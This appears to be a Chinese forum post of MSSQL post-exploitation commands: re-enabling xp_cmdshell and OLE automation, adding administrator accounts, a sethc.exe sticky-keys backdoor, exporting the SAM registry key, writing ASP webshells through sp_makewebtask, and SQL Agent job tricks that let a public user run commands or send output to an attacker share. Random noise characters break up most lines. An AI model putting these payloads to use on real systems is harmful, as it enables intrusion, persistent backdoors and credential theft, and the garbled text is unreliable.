1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号% \& N1 p# j. D* a* A
恢复方法:查询分离器连接后,
. {( i' _! q5 j4 J第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int 6 }2 Z6 ~' o* I& s7 O
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
' s5 j5 ?! o6 T5 f" s* d# j/ E然后按F5键命令执行完毕- L8 Z" Z- S# M' V1 Q) B
& C- W' ?1 P- o8 F/ \7 B5 M
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
' g4 Y, I! `: _恢复方法:查询分离器连接后," e6 A# J1 [$ X G5 Z4 T
第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"
3 X T) Y% k/ T- x+ b第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'% T/ c5 k, r) ^0 E
然后按F5键命令执行完毕2 M2 F, V" K; e1 e9 ~+ `2 i
+ z# w5 o! u4 R/ z: F4 F
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)$ Y0 C' Z, I1 u: a+ w \: {. }7 M2 P
恢复方法:查询分离器连接后,3 J- u! k5 a+ a8 [/ _
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'; [* \6 k0 P) I r
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' n1 [; r* u2 C/ O8 {2 b: G8 |' g
然后按F5键命令执行完毕
& {9 Q/ ^7 b+ p! ^
0 n# {: a; H+ W8 M5 Q4 终极方法.
4 E0 `5 ?$ X# s! A$ ]6 F如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
X$ j/ \( P& n8 o4 h查询分离器连接后,3 y8 Y7 L. Y6 R0 I
2000servser系统:3 L ^) a' Y8 i; e$ p9 {0 B
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
' y' N# m5 G8 p) q, @
$ \% O( ^, h) l/ mdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'
g) q2 W( o; i# r$ |
) x. x; v8 @% Q! w0 ?; Z# p& hxp或2003server系统:6 P$ ]. Z/ R& M7 b! l) S) e6 d' u* C5 G
6 i* U; o1 B8 F |1 u- M- e
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
3 @! Y- T5 [4 ? N% {" M y% N. F
: r7 u& A9 a( j0 f1 _/ hdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
( H' s/ z- W! z2 m
% G3 h( d1 d, {% H- g7 n2 n- g$ N" b f& f1 d
五个SHIFT+ e: _( P& @; r; K% G
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';1 L/ N9 ^7 ?! l. a0 Y( w
, V# d6 F4 i6 Y, r, L2 M$ q
declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
- d# n' M C& V3 z& F
# N7 x! A/ t/ ?4 h. ?, Exp_cmdshell执行命令另一种方法
+ p; I& ^* n/ Y, s0 y# |declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add' 5 ^& `& x7 H [3 I* f+ f( q& e# S
' p4 X% N# P% W4 ]7 ~判断存储扩展是否存在" {3 G1 q/ u5 E4 \) a( z
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'6 i" [1 x% I3 ^' \! ]* x
返回结果为1就OK2 Z5 x; D4 O8 y6 F6 j a
# ^9 Y0 I/ x6 r* ~$ M, j
- J5 v# o- G# Q1 q; }9 `上传xplog70.dll恢复xp_cmdshell语句:) ~$ |, d- i+ _, V+ L; U5 A6 o$ k4 m
sp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'
. c; P8 D: @/ E, W6 y* H& f' {+ d1 D s- M
否则上传xplog7.0.dll
J0 p" S+ _% _8 z* X% x% D; e: ]" fExec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'
2 m/ y' [& D/ B& U' A* }; r+ [$ w- z3 j8 f' V" S& c- d
: x! m! q, q: M* @0 S, ^$ r8 Z- f3 I6 d
首先开启沙盘模式:
5 Y7 Q9 V: B) o! m$ d# P$ E; kexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',18 `8 ^5 f y" [/ o/ ~- n' w+ W ^" @
9 w; \7 z; A y- Y8 Q然后利用jet.oledb执行系统命令( v. L( G- ?4 y5 E6 X
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")'), O8 u5 j5 a- @$ _0 z
返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了+ h' y1 U' p" k3 A- [0 `9 o, @9 ?" T
$ ?2 k: `6 O1 s' J7 N& y9 B3 d
& ^0 ~/ R5 P4 z& _
" V/ W+ U$ V3 R, O) ]/ B恢复过程sp_addextendedproc 如下:
1 {. Z2 A; m' W. I3 S; ~3 Qcreate procedure sp_addextendedproc --- 1996/08/30 20:13 8 E4 E0 M+ \5 a: a' m
@functname nvarchar(517),/* (owner.)name of function to call */ 2 F% L. W. Z: O* W" c
@dllname varchar(255)/* name of DLL containing function */ }7 d8 P1 f9 Z+ ]- K
as 5 G3 p* k% F2 g$ n/ y
set implicit_transactions off 9 b1 e. k6 P* G/ f4 o) N. W
if @@trancount > 0 . K, h. R! y" f" q- K
begin 7 c; ^+ C3 Z" T2 ]. i
raiserror(15002,-1,-1,'sp_addextendedproc') : j4 e4 G9 J) H. X" q( P5 T9 W
return (1) ( ^. K! h# ]! `1 s
end * O9 N# E: a) D3 C# V7 r
dbcc addextendedproc( @functname, @dllname)
) K; W* u6 j9 v5 h; _: w& zreturn (0) -- sp_addextendedproc 0 v3 A7 _* x: [( f0 \0 d* u
GO - [! s0 I0 x/ X. y3 C, g9 F
1 k; d3 s/ g6 g2 V S" G
; w+ w3 b" K+ j. \0 g
8 z. j0 x- V! W" ?$ a4 b+ c导出管理员密码文件
' o& E; H& E! B4 X. E2 Z3 zsa默认可以读sam键.应该。 k V g$ ]9 s/ |
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
6 v" M; i# q$ G0 w; Onet user administrator test
* ]( V$ W" O3 a* {用administrator登陆.
) `$ ]" O8 k$ a用完机器后
+ v$ u) S& z% l' t3 ]% Creg import c:\test.reg$ Z [4 X8 b* }, X% u
根本不用克隆.5 m% ]# D$ x! i9 S
找到对应的sid. * O/ x) g! c6 ?, S; g
+ F |9 g) R5 A' R0 E2 t
0 V. ^3 c- w5 ^# z4 O
! T5 Y; `2 e0 P. }
恢复所有存储过程) g. A. \( [1 N7 n" A( J
use master $ N, e9 t/ W7 g; R, n/ T/ {; m
exec sp_addextendedproc xp_enumgroups,'xplog70.dll' ; x- Z3 B( u! |, g* t. [
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
0 t% w9 F5 I* }) _8 Sexec sp_addextendedproc xp_loginconfig,'xplog70.dll' * L7 ?: D8 H( p( Q. n7 R
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' 3 Q V& o" h' P- B4 K- `+ H5 A
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
. z: ^. t1 x+ G! iexec sp_addextendedproc sp_OACreate,'odsole70.dll'
9 _% a% x/ ]/ ]7 Qexec sp_addextendedproc sp_OADestroy,'odsole70.dll'
% i# C1 p: {3 Dexec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' 7 E" Z4 D+ C& ~& F i( P* h6 J4 C( z ~
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
* _! \6 D+ _7 ^* @$ S4 rexec sp_addextendedproc sp_OAMethod,'odsole70.dll'
' S3 { F: g! R* ]+ iexec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
& [4 `2 ^0 a8 H7 _0 texec sp_addextendedproc sp_OAStop,'odsole70.dll' 7 `. J7 e2 M& R* H2 R/ F% l
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
, p& Q. F3 R" {9 M Lexec sp_addextendedproc xp_regdeletekey,'xpstar.dll' 6 q/ H) |& ~, F% Q! B1 s
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll' U5 G# g! Q2 ^
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll' 8 a8 h# D" {' O
exec sp_addextendedproc xp_regread,'xpstar.dll'
/ }! A# ]% o! Y7 _$ a" zexec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
( I/ h7 F9 Z/ T3 uexec sp_addextendedproc xp_regwrite,'xpstar.dll' 6 j/ ^2 Z# S, ^8 g# L9 C9 D
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
% i- b( A/ }7 h! t- l) E0 c9 e0 g; {9 X4 B
& F" J$ m. ~9 w
建立读文件的存储过程
' V! ]% \ a4 c; lCreate proc sp_readTextFile @filename sysname7 I# s2 B+ v; c7 ]9 f1 h4 r
as
3 S+ [: e8 `# ~1 ^5 U1 M# O% [- a
; q5 z& x% B. [; q" v6 w5 a F begin
" S8 e5 V" ~( ]/ n: ^7 y set nocount on
$ i3 P: k- c; m, k Create table #tempfile (line varchar(8000))( z4 h9 v8 b. K8 h; ]6 R* P
exec ('bulk insert #tempfile from "' + @filename + '"')) L. t% Y5 N6 x2 V# S
select * from #tempfile
$ ?/ V! V7 m+ R- Y& I5 W drop table #tempfile2 Y1 G) N( S4 y
End3 b7 |/ |0 o$ }
: V6 r! a: ?0 j7 i- E% h( u7 Z! X
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件6 O- ~- Q2 p3 J$ N$ _
查看登录用户( r$ y: M" Z+ Q4 k: \; u. y. z
Select * from sysxlogins* J% ?9 _0 G5 Y7 m+ i1 x( t* J7 I
+ \' {8 s' m q; b+ h- |( ?
把文件内容读取到表中
4 {7 z+ C0 i/ S3 w1 S2 BBULK INSERT tmp from "c:\test.txt"
; o( [3 V7 n7 j# n& e: V0 SdElete from 表名 清理表里的内容
6 S; Q( ~" b7 G' ]; Tcreate table b_test(fn nvarchar(4000));建一个表,字段为fn
! [9 X9 R* _+ s) T, g- g
8 p; A: y1 |7 e- B) R( X, z _* ^, U9 h4 c
加sa用户1 ?1 i" y7 k' N4 {6 `, G
exec master.dbo.sp_addlogin user,pass;' q5 g- g d& b3 I, [, a. I2 ]
exec master.dbo.sp_addsrvrolemember user,sysadmin
Q+ a- s8 {5 ]9 B( j( }$ U+ r. b0 u% P
$ h1 F4 }8 B7 P5 x8 J1 f8 O
" J9 I. f; f+ Q读文件代码4 ^* _7 Y3 ^2 W7 X: R, g/ }
declare @o int, @f int, @t int, @ret int
9 u( ?( m! J Fdeclare @line varchar(8000)
0 x% N; w$ o# }/ ?exec sp_oacreate 'scripting.filesystemobject', @o out" W% T5 ^% M8 u$ Y# b
exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1' m; |$ Q3 M6 ?( Q8 L. r7 {9 z
exec @ret = sp_oamethod @f, 'readline', @line out9 R8 l6 x5 V' p: I$ D! O
while( @ret = 0 )6 h, r5 L3 b2 e" T% J
begin
# R4 \6 R3 ?% w6 G' ~0 m! c8 b( Iprint @line$ Y/ {" |0 \) G# u
exec @ret = sp_oamethod @f, 'readline', @line out) I9 S0 f( n, h0 d5 S+ U6 w% H
end+ w( g1 c3 r0 f3 K3 { K p! H0 Z
( R9 ]8 \; s8 n- ]" o: z
- Y' e7 U6 a n* r" V! i写文件代码:( t( I( t! y0 Y& U# T* ?: a
declare @o int, @f int, @t int, @ret int
1 V' j6 o4 c4 b$ E8 Wexec sp_oacreate 'scripting.filesystemobject', @o out
' G# N- ?( S I" P3 E1 c& gexec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1
2 C6 R! k+ ~$ w0 B: Q. `exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》3 o8 Z" e' u+ M+ [. E& a( e: n
) R4 f3 y. E7 R- X* A8 c# \3 ^8 B
0 H6 R# t; H- m( a- B7 z" _添加lake2 shell; d0 _ C& V4 t, e8 V
sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
$ `$ e9 i5 A# H R7 f# ~3 G! ]sp_dropextendedproc xp_lake2! q- a& @# K5 X3 @" \: |' Q; G
EXEC xp_lake2 'net user'
2 O+ I. Q. P0 {7 K; f) L2 y9 O
3 T5 D8 H. W p2 p5 `. h
, N$ B% {* m! L J. J得到硬盘文件信息
) ^+ o: Z% f( U$ f--参数说明:目录名,目录深度,是否显示文件 ! P: v- o9 S( P0 M; p l) T$ z
execute master..xp_dirtree 'c:'
/ G* A1 x' i6 d6 aexecute master..xp_dirtree 'c:',1
, y' u/ i# N4 k5 z' _* e1 cexecute master..xp_dirtree 'c:',1,1 ; |& V( J) F- \5 o" ~4 x
* Z; A# E' A' D! v& r2 _3 }0 h; k6 h8 s t, j
读serv-u配置信息; P' T& P# L* Z( L
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
6 k7 E* C+ }9 g) \9 f& q" jexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'+ w& P: ` P4 Y7 v
2 r6 y! a" _# U }) g通过xp_regwrite写SHIFT后门5 F) x4 d) O2 i+ m4 i. V U3 {
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--) s3 D/ z' N& m. d
. B2 J# p( O- B
0 d' S& C$ q. \( m V
6 A! x& j7 A% D0 w- {+ _& n找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com'; K' V( @0 q$ i" Z( `) F% }
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了
5 s* R5 g5 M* j5 r7 F. |; w, C- n9 A6 d3 h8 f( g
EXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'* d9 N$ [# u- A r: Q2 }: c) S9 ]
8 o( ?; { u5 l) W6 b( H0 V& O
8 j! h+ J1 d2 {% ~$ A+ {0 S; _# v) a, e x! Z# L1 ~) m6 Y
sql server 2005下开启xp_cmdshell的办法
7 b/ P. @% J0 _5 n# J8 X! t
; K6 r: x3 a1 y5 HEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
* x' H0 ^) Q) j& D l7 }" `, R# Y1 X- J, h* @9 F! q
SQL2005开启'OPENROWSET'支持的方法:
' ~: e0 G& I( W. k1 T# C1 `
0 @$ E. D( d$ d' r- jexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE; s2 W5 R! v+ u: K( n7 `5 L
2 d0 g; f0 ?3 ]9 E' M/ p" ~4 z
SQL2005开启'sp_oacreate'支持的方法:6 \- V8 _2 {. B% v3 q
+ V- b# @/ i P! A" R& Z3 aexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
- \7 B; ?% ~$ W8 M% B( `
9 L t& O3 n* z4 R8 O6 N, r& V$ i
7 { \8 d2 ~# E8 o* n0 U, J9 \( T7 l# T, ~2 ^ h2 W6 B4 x5 E2 F( n2 i
W2 ]% A! r& i
; Q4 W, w6 K- a: o, {: B# X$ \0 Q2 n* ^
+ {: d+ T% \$ I
, n( z) c$ D/ S3 q/ N0 e/ ~' P* M0 ~& d' X8 \/ Z' U7 T/ K
4 g" j" `7 U/ v
( q( h7 p* Q& }7 ~0 b0 V3 Z# }2 V; F0 E1 v @- F& p! d) s) X
|% F3 i3 i8 J4 \, o
: A1 s( o* o- S, d: r1 _8 F' u
; R. E( d# M }6 \1 v \1 h
( W; t, ^/ ]3 W+ A5 [
" Y; F4 y4 ~6 [7 i0 o5 R5 p
- d3 K( |$ |6 L4 v- I, f, M
) l. y5 y1 I2 ?
+ ^3 w3 C5 G: n4 n4 t; p& d$ T$ {/ W
4 p8 y) J7 F- Z; S; g' ~
! j2 d5 A0 c1 p5 y: T- H1 V7 ?9 o1 F$ S/ p6 y- K* j3 j7 t
以下方面不知道能不能成功暂且留下研究哈:- [+ l3 M& R. E$ y: D
4)5 y, V: `( F6 s# o& }% ?& [+ \
use msdb; --这儿不要是master哟6 E3 @! H# t# b4 J' ?. d
exec sp_add_job @job_name= czy82 ;% v2 U2 w1 c" u* \2 H
exec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;
: ?& r' j/ g* Xexec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;9 C+ M5 {6 A& w+ |2 d' B/ Q7 k; `
exec sp_start_job @job_name= czy82 ;
" x4 P0 H J" M1 o3 d l1 z' ]
: L- D' w! C( X- ?利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以& x* j9 _1 e2 \# c
执行tsql语句了.
/ U8 e) k! m1 _( Q# I& ^对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名9 {9 H( G/ s w/ X
第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)2 j: R6 ]7 T) Z' X/ t1 I8 F
net start SQLSERVERAGENT+ C$ \- n& d- K3 E
$ z" u; n. r' _6 F2 P: y/ p$ y
对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的1 }% c: |1 g7 c j% f5 E& k, Z
USE msdb# z3 E, `7 k4 u8 \; U! a2 H
EXEC sp_add_job @job_name = GetSystemOnSQL ,4 k/ J! |- t: e
@enabled = 1,
q$ H4 g* H' \, I@description = This will give a low privileged user access to% D7 Q( ]7 P$ }: M- N. _
xp_cmdshell ,2 n2 |. b% n5 q, ~1 G
@delete_level = 1
. ?/ Y2 P9 U5 X2 \$ }: F+ SEXEC sp_add_jobstep @job_name = GetSystemOnSQL ,
8 t# D; W' f1 |% X* V: Q) z@step_name = Exec my sql ,! G9 ]" Q% V# x# H3 U# Y- N
@subsystem = TSQL ,( n9 k @# {" @% y
@command = exec master..xp_execresultset N select exec/ ?7 T8 q0 e: z; A k
master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master + s- }, i& |) S7 @) P/ P* x
EXEC sp_add_jobserver @job_name = GetSystemOnSQL ,
/ i- F# K9 Y( Y" r0 T8 E@server_name = 你的SQL的服务器名 3 [/ T/ i0 \! e
EXEC sp_start_job @job_name = GetSystemOnSQL & K0 q# C% d% V& t2 `& C' g
6 T, g9 x% m i2 l3 ^' N不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以
1 A1 w. Z/ l* }1 Z7 a才让我们可以以public执行xp_cmdshell
& O( S6 X( d. z( S9 X; T$ j- F( U. F, B9 Y+ h
5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)
, E1 s" q+ f7 g8 d# a- t在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968: T: x }/ H/ f4 v
- \% e! z8 Z- L8 N- l1 W1 [9 ^3 FUSE msdb% C3 S# [- ` W* T8 h& z
EXEC sp_add_job @job_name = ArbitraryFilecreate ,
( Q5 W/ j: e6 n& }0 H@enabled = 1," N1 D' X9 `" @) }
@description = This will create a file called c:\sqlafc123.txt ,
8 S( X" w. U. q! F3 `* k@delete_level = 1
1 K: I7 b) Y6 i+ u& n3 L. U5 MEXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,1 E/ y ~6 n& x$ x
@step_name = SQLAFC ,1 |" C: `4 o& Z- J7 @5 i% _
@subsystem = TSQL ,
" f% X k1 {- M0 ]; W0 I1 y. ~@command = select hello, this file was created by the SQL Agent. ,$ h+ U6 \; M O$ J. k
@output_file_name = c:\sqlafc123.txt
# P l* N0 @) C/ c- {) S; k& ~EXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,
! N" @' W3 p b8 f4 L( } o! e@server_name = SERVER_NAME
2 e7 E1 p3 _" v: X4 zEXEC sp_start_job @job_name = ArbitraryFilecreate 2 D5 _$ X. R1 u, m
& o9 E6 W: f0 j# M如果subsystem选的是:tsql,在生成的文件的头部有如下内容. }- [7 g% W; K* E u! _
$ n% y+ ?9 N. X* c' a
??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19% t1 N& X: @% e! n
----------------------------------------------/ p# k( f+ \+ w1 U7 O
hello, this file was created by the SQL Agent.0 w# p* x4 R9 e. {4 q& q* k. d
" j$ t4 ^( [% Q6 [8 a/ M(1 ?????)$ c9 l9 n. |# c5 Q4 P
x! Z! ]) x' j4 [! `
所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员8 Z, N4 q% Z/ z+ i# J0 b1 f C4 T
命令的vbs文件到启动目录!+ X; w' v. |- r4 L7 \
\& u$ A: O' D l: q) l5 n
6)关于sp_makewebtask(可以写任意内容任意文件名的文件)$ g2 y) x/ p* _8 r" A
关于sp_MScopyscriptfile 看下面的例子/ m: r% b3 @3 k) g6 Y- J+ g, V2 z
declare @command varchar(100) % \: q+ |* C4 H$ b; C2 x4 u0 f2 C
declare @scripfile varchar(200) 2 o5 x. S# o$ e8 o2 `
set concat_null_yields_null off ) B( G9 J) ~1 p) x! X8 `" ~' P) H& `
select @command= dir c:\ > "\\attackerip\share\dir.txt" 7 A: N8 D& n+ y! `+ }
select @scripfile= c:\autoexec.bat > nul" | @command | rd " ( \8 q" V& E4 d9 l( a4 {- S& ~
exec sp_MScopyscriptfile @scripfile , 2 T! T, r2 q1 T0 [& J
7 o9 Z% d) G0 }7 F# M: I8 \这两个东东都还在测试试哟
. F& }* }/ N8 Q# N5 ~让MSSQL的public用户得到一个本机的web shell # S3 N1 s, s+ s
$ B7 \# ~6 A' H) ~( m; F8 nsp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,! _# k( c/ S0 b" s3 P% t
--@query= select <img src=vbscript:msgbox(now())> # c5 z9 d* |7 g! K6 p
--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
- g7 ~* ~* x1 O% J- a4 m@query= select
& P1 I* x1 S) D% [. m0 l<%On Error Resume Next t7 L" d0 G) T! y; w0 K
Set oscript = Server.createObject("wscript.SHELL") : q$ F7 B9 Y/ A+ Q @+ |/ r
Set oscriptNet = Server.createObject("wscript.NETWORK") 1 J( x9 E/ e$ E! }
Set oFileSys = Server.createObject("scripting.FileSystemObject")
( c9 s" o1 |. h1 WszCMD = Request.Form(".CMD")
+ C( @) R! I$ S ^( u( }If (szCMD <>"")Then
) ~( l$ H2 T. z* H- OszTempFile = "C:\" & oFileSys.GetTempName() ; |; _! e) L+ r
Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
# R9 Y& U6 g5 W6 {: o5 `% L/ q wSet oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0)
* Z- X+ a l$ V% ]- EEnd If %> 4 K" ], n% r: Y+ v) D, ?! v9 a
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST">
8 u* ]) I* F2 h- _( G<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
" z- O7 f( c* `* m5 ?# { s/ G1 W</FORM><RE>
6 e: @4 ]0 A0 N" h* N# _<% If (IsObject(oFile))Then * \* \% z5 z( n. L3 s5 [
On Error Resume Next * N! h- D, ~+ g; Q% Q
Response.Write Server.HTMLEncode(oFile.ReadAll) # @6 ]0 w ]& r- I5 i
oFile.Close
+ D0 r+ E4 X6 g% |3 SCall oFileSys.deleteFile(szTempFile, True)
+ [" c4 j5 ], n! x) N& tEnd If%>
7 {$ O+ h- k" E4 i9 X1 H</BODY></HTML> # O6 L7 b4 c% F- \
|
发表于 2012-9-15 14:37:30
收藏
支持
反对